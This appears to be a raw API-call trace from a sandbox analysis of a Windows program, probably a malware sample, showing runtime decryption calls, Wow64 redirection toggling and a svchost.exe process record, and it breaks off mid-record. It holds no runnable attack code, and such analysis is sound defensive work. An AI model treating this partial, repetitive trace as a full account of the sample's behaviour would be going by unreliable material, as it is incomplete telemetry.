[0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.896] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.896] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.896] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0135.347] CryptImportKey (in: hProv=0x12f68a8, pbData=0x4a7fc50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x4a7fcb8 | out: phKey=0x4a7fcb8*=0x1327658) returned 1 [0135.347] CryptSetKeyParam (hKey=0x1327658, dwParam=0x1, pbData=0x4a7fca0, dwFlags=0x0) returned 1 [0135.347] CryptDecrypt (in: hKey=0x1327658, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x4a7fc6c | out: pbData=0x2cb04a0, pdwDataLen=0x4a7fc6c) returned 1 [0135.347] CryptDestroyKey (hKey=0x1327658) returned 1 [0135.348] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0135.348] GetProcAddress (hModule=0x74440000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x74456b50 [0135.348] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0135.348] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 Thread: id = 87 os_tid = 0xf4c [0134.906] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x4411b08 [0134.907] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x4f20048 [0134.907] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x28) returned 0x2cb4520 [0134.907] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x110102) returned 0x512c020 [0134.910] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x50) returned 0x4f30050 [0134.910] CryptImportKey (in: hProv=0x12f68a8, pbData=0x4bbfcf8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x4bbfd60 | out: phKey=0x4bbfd60*=0x13275d8) returned 1 [0134.910] CryptSetKeyParam (hKey=0x13275d8, dwParam=0x1, pbData=0x4bbfd48, dwFlags=0x0) returned 1 [0134.910] CryptDecrypt (in: hKey=0x13275d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4f30050, pdwDataLen=0x4bbfd14 | out: pbData=0x4f30050, pdwDataLen=0x4bbfd14) returned 1 [0134.910] CryptDestroyKey (hKey=0x13275d8) returned 1 [0134.910] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0134.911] GetProcAddress (hModule=0x74440000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74456b30 [0134.911] Wow64DisableWow64FsRedirection (in: OldValue=0x4bbfdb0 | out: OldValue=0x4bbfdb0*=0x0) returned 1 [0134.911] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4f30050 | out: hHeap=0x2cb0000) returned 1 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.911] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.912] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.913] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.915] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.916] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.917] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.918] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.919] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.920] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.920] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.920] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.920] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.920] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.920] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.920] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.920] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.920] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.920] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.920] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.921] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.921] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.921] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.921] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.921] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.921] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.921] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.921] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.921] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.921] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.922] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.923] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.924] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.924] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.924] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.924] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.924] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.924] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.924] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.924] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.924] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.924] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.925] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.926] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.927] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.928] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.929] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.930] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.931] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.931] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.931] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.931] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0135.356] CryptImportKey (in: hProv=0x12f68a8, pbData=0x4bbfcf8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x4bbfd60 | out: phKey=0x4bbfd60*=0x13273d8) returned 1 [0135.356] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0x4bbfd48, dwFlags=0x0) returned 1 [0135.356] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb44c0, pdwDataLen=0x4bbfd14 | out: pbData=0x2cb44c0, pdwDataLen=0x4bbfd14) returned 1 [0135.356] CryptDestroyKey (hKey=0x13273d8) returned 1 [0135.356] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0135.357] GetProcAddress (hModule=0x74440000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x74456b50 [0135.357] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0135.357] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb44c0 | out: hHeap=0x2cb0000) returned 1 [0135.357] SetEvent (hEvent=0x500) returned 1 [0135.357] SetEvent (hEvent=0x4fc) returned 1 [0135.357] SetEvent (hEvent=0x504) returned 1 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x45c97000" os_pid = "0x598" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0xddc" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:000101e6" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 58 os_tid = 0xccc Thread: id = 59 os_tid = 0xc1c Thread: id = 60 